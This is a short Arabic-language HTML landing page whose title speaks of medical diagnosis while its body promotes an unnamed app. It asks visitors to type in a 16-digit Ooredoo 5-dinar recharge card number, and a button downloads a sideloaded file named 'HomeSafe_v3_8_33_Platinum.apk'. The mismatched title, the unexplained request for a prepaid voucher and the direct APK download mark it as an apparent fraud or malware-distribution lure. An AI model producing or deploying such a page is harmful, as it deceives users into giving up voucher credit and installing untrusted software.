<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>تشخيص علاج</title>
<style>
  body {
    font-family: Arial, sans-serif;
    text-align: center;
    margin: 50px;
    background-color: #f4f4f4;
  }
  .container {
    max-width: 600px;
    margin: 0 auto;
    padding: 20px;
    background-color: #fff;
    border-radius: 10px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  }
  h1 {
    font-size: 28px;
    color: #333;
    margin-bottom: 20px;
  }
  p {
    font-size: 18px;
    line-height: 1.6;
    color: #666;
    margin-bottom: 30px;
  }
  button {
    background-color: #4CAF50;
    color: white;
    padding: 15px 25px;
    border: none;
    border-radius: 5px;
    cursor: pointer;
    font-size: 20px;
    transition: background-color 0.3s;
  }
  button:hover {
    background-color: #45a049;
  }
</style>
</head>
<body>

<div class="container">
  <h1>تعرف على التطبيق</h1>
  <p>استخدم تطبيقنا الآن للبدء.</p>
  <label for="rechargeCard">ادخل بطاقة شحن أوريدو 5 دينار:</label>
  <input type="text" id="rechargeCard" name="rechargeCard" pattern="[0-9]{16}" maxlength="16" required>
  <button onclick="window.location.href = 'HomeSafe_v3_8_33_Platinum.apk';">تحميل التطبيق</button>
</div>

</body>
</html>
